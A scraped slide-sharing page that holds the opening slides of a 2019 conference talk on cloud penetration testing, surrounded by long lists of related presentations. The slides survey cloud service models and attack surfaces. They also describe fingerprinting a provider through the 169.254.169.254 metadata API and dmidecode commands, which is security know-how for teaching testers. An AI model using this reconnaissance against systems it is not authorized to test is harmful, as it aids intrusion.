Similar to (SACON) Anant Shrivastava - cloud pentesting

Serverless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesServerless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesUnderscore VC
 
Cloud Architecture - Multi Cloud, Edge, On-Premise
Cloud Architecture - Multi Cloud, Edge, On-PremiseCloud Architecture - Multi Cloud, Edge, On-Premise
Cloud Architecture - Multi Cloud, Edge, On-PremiseAraf Karsh Hamid
 
Introduction to Serverless Computing - OOP Munich
Introduction to Serverless Computing - OOP Munich Introduction to Serverless Computing - OOP Munich
Introduction to Serverless Computing - OOP MunichBoaz Ziniman
 
Smart Integration to the Cloud - Kellton Tech Webinar
Smart Integration to the Cloud - Kellton Tech WebinarSmart Integration to the Cloud - Kellton Tech Webinar
Smart Integration to the Cloud - Kellton Tech WebinarKellton Tech Solutions Ltd
 
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)Jeremy Daly
 
Introduction to AWS Lambda and Serverless Applications
Introduction to AWS Lambda and Serverless ApplicationsIntroduction to AWS Lambda and Serverless Applications
Introduction to AWS Lambda and Serverless ApplicationsAmazon Web Services
 
Intro to AWS Lambda and Serverless Applications: re:Invent 2018 Recap at the ...
Intro to AWS Lambda and Serverless Applications: re:Invent 2018 Recap at the ...Intro to AWS Lambda and Serverless Applications: re:Invent 2018 Recap at the ...
Intro to AWS Lambda and Serverless Applications: re:Invent 2018 Recap at the ...Amazon Web Services
 
Cloud computing elisheba wiggins
Cloud computing elisheba wigginsCloud computing elisheba wiggins
Cloud computing elisheba wigginsElisheba Wiggins
 
Enterprise Cloud Architecture Best Practices
Enterprise Cloud Architecture Best PracticesEnterprise Cloud Architecture Best Practices
Enterprise Cloud Architecture Best PracticesDavid Veksler
 
Who's in your Cloud? Cloud State Monitoring
Who's in your Cloud? Cloud State MonitoringWho's in your Cloud? Cloud State Monitoring
Who's in your Cloud? Cloud State MonitoringKevin Hakanson
 
#dbhouseparty - Should I be building Microservices?
#dbhouseparty - Should I be building Microservices?#dbhouseparty - Should I be building Microservices?
#dbhouseparty - Should I be building Microservices?Tammy Bednar
 
12 Factor Serverless Applications - Mike Morain, AWS - Cloud Native Day Tel A...
12 Factor Serverless Applications - Mike Morain, AWS - Cloud Native Day Tel A...12 Factor Serverless Applications - Mike Morain, AWS - Cloud Native Day Tel A...
12 Factor Serverless Applications - Mike Morain, AWS - Cloud Native Day Tel A...Cloud Native Day Tel Aviv
 
Federal Webinar: Application monitoring for on-premises, hybrid, and multi-cl...
Federal Webinar: Application monitoring for on-premises, hybrid, and multi-cl...Federal Webinar: Application monitoring for on-premises, hybrid, and multi-cl...
Federal Webinar: Application monitoring for on-premises, hybrid, and multi-cl...SolarWinds
 
What is A Cloud Stack in 2017
What is A Cloud Stack in 2017What is A Cloud Stack in 2017
What is A Cloud Stack in 2017Gaurav Roy
 
Modern Applications Development on AWS
Modern Applications Development on AWSModern Applications Development on AWS
Modern Applications Development on AWSBoaz Ziniman
 
Serverless service adoption for Thailand
Serverless service adoption for ThailandServerless service adoption for Thailand
Serverless service adoption for ThailandWatcharin Yang-Ngam
 
Building and Successfully Selling ISV Solutions with AWS Partner-Summit-Singa...
Building and Successfully Selling ISV Solutions with AWS Partner-Summit-Singa...Building and Successfully Selling ISV Solutions with AWS Partner-Summit-Singa...
Building and Successfully Selling ISV Solutions with AWS Partner-Summit-Singa...Amazon Web Services
 
Twelve-Factor App Methodology and Modern Applications | AWS Summit Tel Aviv 2019
Twelve-Factor App Methodology and Modern Applications | AWS Summit Tel Aviv 2019Twelve-Factor App Methodology and Modern Applications | AWS Summit Tel Aviv 2019
Twelve-Factor App Methodology and Modern Applications | AWS Summit Tel Aviv 2019AWS Summits
 

Similar to (SACON) Anant Shrivastava - cloud pentesting (20)

Serverless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment OpportunitiesServerless: Market Overview and Investment Opportunities
Serverless: Market Overview and Investment Opportunities
 
Cloud Architecture - Multi Cloud, Edge, On-Premise
Cloud Architecture - Multi Cloud, Edge, On-PremiseCloud Architecture - Multi Cloud, Edge, On-Premise
Cloud Architecture - Multi Cloud, Edge, On-Premise
 
Introduction to Serverless Computing - OOP Munich
Introduction to Serverless Computing - OOP Munich Introduction to Serverless Computing - OOP Munich
Introduction to Serverless Computing - OOP Munich
 
Smart Integration to the Cloud - Kellton Tech Webinar
Smart Integration to the Cloud - Kellton Tech WebinarSmart Integration to the Cloud - Kellton Tech Webinar
Smart Integration to the Cloud - Kellton Tech Webinar
 
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)
Serverless Security: Best practices and mitigation strategies (re:Inforce 2019)
 
Introduction to AWS Lambda and Serverless Applications
Introduction to AWS Lambda and Serverless ApplicationsIntroduction to AWS Lambda and Serverless Applications
Introduction to AWS Lambda and Serverless Applications
 
Intro to AWS Lambda and Serverless Applications: re:Invent 2018 Recap at the ...
Intro to AWS Lambda and Serverless Applications: re:Invent 2018 Recap at the ...Intro to AWS Lambda and Serverless Applications: re:Invent 2018 Recap at the ...
Intro to AWS Lambda and Serverless Applications: re:Invent 2018 Recap at the ...
 
Cloud computing elisheba wiggins
Cloud computing elisheba wigginsCloud computing elisheba wiggins
Cloud computing elisheba wiggins
 
Enterprise Cloud Architecture Best Practices
Enterprise Cloud Architecture Best PracticesEnterprise Cloud Architecture Best Practices
Enterprise Cloud Architecture Best Practices
 
Who's in your Cloud? Cloud State Monitoring
Who's in your Cloud? Cloud State MonitoringWho's in your Cloud? Cloud State Monitoring
Who's in your Cloud? Cloud State Monitoring
 
#dbhouseparty - Should I be building Microservices?
#dbhouseparty - Should I be building Microservices?#dbhouseparty - Should I be building Microservices?
#dbhouseparty - Should I be building Microservices?
 
12 Factor Serverless Applications - Mike Morain, AWS - Cloud Native Day Tel A...
12 Factor Serverless Applications - Mike Morain, AWS - Cloud Native Day Tel A...12 Factor Serverless Applications - Mike Morain, AWS - Cloud Native Day Tel A...
12 Factor Serverless Applications - Mike Morain, AWS - Cloud Native Day Tel A...
 
Federal Webinar: Application monitoring for on-premises, hybrid, and multi-cl...
Federal Webinar: Application monitoring for on-premises, hybrid, and multi-cl...Federal Webinar: Application monitoring for on-premises, hybrid, and multi-cl...
Federal Webinar: Application monitoring for on-premises, hybrid, and multi-cl...
 
What is A Cloud Stack in 2017
What is A Cloud Stack in 2017What is A Cloud Stack in 2017
What is A Cloud Stack in 2017
 
Modern Applications Development on AWS
Modern Applications Development on AWSModern Applications Development on AWS
Modern Applications Development on AWS
 
AWS 101
AWS 101AWS 101
AWS 101
 
Serverless service adoption for Thailand
Serverless service adoption for ThailandServerless service adoption for Thailand
Serverless service adoption for Thailand
 
AWS User Group November
AWS User Group NovemberAWS User Group November
AWS User Group November
 
Building and Successfully Selling ISV Solutions with AWS Partner-Summit-Singa...
Building and Successfully Selling ISV Solutions with AWS Partner-Summit-Singa...Building and Successfully Selling ISV Solutions with AWS Partner-Summit-Singa...
Building and Successfully Selling ISV Solutions with AWS Partner-Summit-Singa...
 
Twelve-Factor App Methodology and Modern Applications | AWS Summit Tel Aviv 2019
Twelve-Factor App Methodology and Modern Applications | AWS Summit Tel Aviv 2019Twelve-Factor App Methodology and Modern Applications | AWS Summit Tel Aviv 2019
Twelve-Factor App Methodology and Modern Applications | AWS Summit Tel Aviv 2019
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 

Recently uploaded (20)

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 

(SACON) Anant Shrivastava - cloud pentesting

  • 1. SACON SACON International 2019 India | Bangalore | February 15 - 16 | Taj Yeshwantpur Cloud Pentesting Anant Shrivastava NotSoSecure Regional Director APAC @anantshri
  • 2. SACON 2019 • Introduction to Cloud Computing • Product Offerings by Major Vendor’s • AWS • Azure • GCP • Cloud vs Conventional Pentesting • Explore Attack Surfaces (IaaS, PaaS, SaaS, Serverless) • Exploiting Metadata API’s • Abusing cloud storage • Forensic analysis of cloud snapshots • Attacking Azure AD • Attacking Serverless • Understanding and attacking IAM Services • Various Case Studies Agenda
  • 3. SACON 2019 Anant Shrivastava ● Regional Director @ NotSoSecure ● 10 yrs of corporate experience ● Speaker / Trainer : BlackHat, Nullcon, RootConf, c0c0n, RuxCon ● Contributor / reviewer : OWASP Testing Guides (Web / Mobile) ● Project Lead : Code Vigilant, Android Tamer ● https://anantshri.info ( @anantshri on social platforms) #WHOAMI
  • 4. SACON 2019 This Session is highly opinionated. All thoughts are my own and not authorized or endorsed by my company or organizers. I am standing on giant’s shoulders: a lot of what I am going to talk about is public knowledge just compiled in one single place for all. This field is constantly evolving, my understanding and explanation might be wrong or convoluted if you feel a better approach is possible be ready I will need that help. Disclaimer
  • 5. SACON 2019 Cloud computing could be summarized as a [decentralized] shared pool of remotely accessible resources with rapid provisioning capabilities. However the reason cloud computing makes sense for anyone is 1. Low IT hardware overheads 2. Minimal management overheads 3. Massive upfront cost saving (running cost could be higher if unoptimized) In short if done right it saves $$$$$ and that’s why people want it Introduction to Cloud Computing
  • 6. SACON 2019 My understanding Ruler : AWS Challengers: Google Cloud Platform, Azure Others: IBM, Oracle, Alibaba, Digital Ocean, Heroku and many more Out of the league: OpenStack Lets understand the landscape
  • 7. SACON 2019 Lets understand the landscape https://www.canalys.com/newsroom/cloud-market-share-q4-2018-and-full-year-2018
  • 8. SACON 2019 What is Offered by : Amazon Web Services Entry on right side are categories not products Largest service provider Most popular / Known Offerings • EC2 • S3 • RDS • Beanstalk • CloudWatch • Route53 • IAM • Cloudfront • Lambda 50 products listed on this page : https://www.amazonaws.cn/en/products/
  • 9. SACON 2019 What is offered by Azure Another Giant in terms of services offered. Individual service count goes well above 100 Most popular known offerings • Azure AD • hosted IIS Solutions • Office 365 • Team Foundation • Azure Windows VM List of all services : https://azure.microsoft.com/en-in/services/
  • 10. SACON 2019 What is offered by: GCP Multitude of product offerings Most popular: • Gmail • Google Suite (Office, mail, plus more) • Google+ ( :D :D ) List of all services: https://cloud.google.com/products/
  • 11. SACON 2019 What is available as part of OpenStack Self Deployed or custom deployable solution hence service count differs Opensource package has 62 different services https://www.openstack.org/software/project-navigator/openstack-components Some sample configurations are available at https://www.openstack.org/software/sample-configs
  • 12. SACON 2019 Smaller players IBM : https://www.ibm.com/cloud/ A full-stack cloud platform with over 170 products and services covering data, serverless, containers, AI , IoT and blockchain. Oracle: https://cloud.oracle.com/home Focused on Enterprise section Heroku : https://www.heroku.com/products Primarily PaaS Offerings Alibaba Cloud : https://www.alibabacloud.com/product
  • 13. SACON 2019 Conventional vs Cloud Pentesting • System misconfiguration vs unpatched issues • Service provider approvals • You are tenant, service provider is owner • Owner can close accounts / throttle service / block connections to safeguard itself • Targets shift • Conventional : DA / EA and you are done • Cloud: cloud admin is the new top boss • Max Damage shift • Old: AD will be gone or data stolen • New: exuberant bill, and data stolen and data destruction and GDPR + more
  • 14. SACON 2019 Cloud Roles and Responsibilities Reference: https://aws.amazon.com/compliance/shared-responsibility-model/ https://blogs.msdn.microsoft.com/azuresecurity/2016/04/18/what-does-shared-responsibility-in-the-cloud-mean/
  • 15. SACON 2019 Cloud Roles and Responsibilities https://medium.com/@pkerrison/pizza-as-a-service-2-0-5085cd4c365e
  • 16. SACON 2019 Infrastructure as a Service • IaaS ~ VM in a server • You manage everything sitting in VM • Tenant responsibilities include • OS Updates • Middleware/Server Update • App/services updates • Secure configuration of services • Data sitting on top of the apps/services • Network communications
  • 17. SACON 2019 Attack Surface : Infrastructure as a Service • All tenant responsibilities are direct attack surfaces • Application Level bugs leading to Code execution or file read • Weak credentials • Insecure configurations of cred gateways (no NLA on RDP) • Insecure Firewall Configurations
  • 18. SACON 2019 Attack Surface : Infrastructure as a Service: Metadata API • Almost all cloud service providers communicate specific metadata to services via a novel method of Metadata API • A non-routable IP Address is taken and any request to it is handled by cloud provider themselves http://169.254.169.254/ • This API Provides access to plethora of information about the services themselves • Official Documentation: 1. AWS: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html 2. GCP: https://cloud.google.com/compute/docs/storing-retrieving-metadata 3. Azure: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service 4. Opendata: https://docs.openstack.org/nova/rocky/user/metadata-service.html compatible with AWS “2009-04-04” version • Metadata API is not just limited to IaaS but its common across the platforms[almost] • Like all services ever created this has its own Quirks (we will explore that in attack section)
  • 19. SACON 2019 Exploring Platform as a Service and its Attack Surface • Less things to worry about compared to IaaS more then SaaS • Tenant responsibilities include • App/services updates • Secure configuration of services • Data sitting on top of the apps/services • Network communications • Attack Surface • Application flaws • Data storage permissions (exposed buckets) • Data at transit setup (TLS) • Insecure configurations as less control over upper stack • Example of PaaS: Elasticbeanstalk, app-engine, Azure (cloudservices and websites), S3
  • 20. SACON 2019 Exploring: SaaS • Minimal control over anything besides data storage and access to data • Attack surface boils down to logical flaws, access and authorization issues • Back to Web Application pentesting principals • However if a bug is found Its impact can be widespread and affect multiple / all tenants • Example of simpler bugs in SaaS : Subdomain takeover issues
  • 21. SACON 2019 Exploring: FaaS • Its only named serverless :P • FaaS would not manage data hence each action is atomic in nature • Function execution is generally timeboxed (few minutes to 1 sec) • Each execution could be in different environment depending on configuration
  • 22. SACON 2019 Show me the action So we now have a clear understand of what each of these larger entities mean. Now lets look at ways and means to own and pwn these services We will look at: 1. How to identify our target 2. What are the exposed areas to focus on 3. Exploiting the scenario Towards the end we will talk about what could be mitigation options
  • 23. SACON 2019 Understanding your environment Lets assume you got access to a system, how can you identify which service provider is in action. 1. Straight forward: Reverse IP Lookup (may not be accurate as internally they may have routed things around) 2. System commands: Linux (sudo capable) 1.sudo dmidecode -s bios-version (gives vendor name) 2.sudo dmidecode -s bios-vendor (Google for GCP)
  • 24. SACON 2019 Understanding your environment Metadata API (http://169.254.169.254) 1. Azure: gives unauth error if Metadata: true is not present 2. GCP: Requires “Metadata-Flavor: Google” in all requests 3. GCP: for curl to http://metadata.google.internal we get a response with Metadata-Flavor: google 4. AWS: curl request gives a http response Note: The requirement for headers is a clever hack which blocks SSRF attacks
